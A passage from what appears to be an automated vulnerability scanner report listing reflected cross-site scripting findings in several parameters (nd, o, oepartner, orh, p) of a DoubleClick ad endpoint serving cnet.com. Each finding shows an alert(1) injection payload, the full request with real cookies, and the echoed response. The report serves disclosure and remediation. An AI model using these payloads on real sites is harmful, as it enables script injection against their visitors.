User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
5690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686f3887'-alert(1)-'475192829dd&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04
...[SNIP]...

3.133. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55903"-alert(1)-"845905cb38 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068655903"-alert(1)-"845905cb38&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
5690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068655903"-alert(1)-"845905cb38&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04
...[SNIP]...

3.134. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22a4c"-alert(1)-"de1f191fdee was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a22a4c"-alert(1)-"de1f191fdee&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a22a4c"-alert(1)-"de1f191fdee&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.
...[SNIP]...

3.135. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bb96'-alert(1)-'908dcb3612e was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a4bb96'-alert(1)-'908dcb3612e&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19%3B1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a4bb96'-alert(1)-'908dcb3612e&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.
...[SNIP]...

3.136. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cf37'-alert(1)-'450e0e876d3 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=2cf37'-alert(1)-'450e0e876d3&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=2cf37'-alert(1)-'450e0e876d3&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.137. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9378a"-alert(1)-"c9b031313ac was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=9378a"-alert(1)-"c9b031313ac&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=9378a"-alert(1)-"c9b031313ac&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type =
...[SNIP]...

3.138. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f0ad'-alert(1)-'2732c1fdd68 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com8f0ad'-alert(1)-'2732c1fdd68&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
og.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com8f0ad'-alert(1)-'2732c1fdd68&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.139. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce5d5"-alert(1)-"1bfb13a346d was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.comce5d5"-alert(1)-"1bfb13a346d&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
og.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.comce5d5"-alert(1)-"1bfb13a346d&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";

...[SNIP]...

3.140. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b324'-alert(1)-'1aa36b96c8d was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.141. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e14"-alert(1)-"d476ec4b721 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.142. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]  previous  next

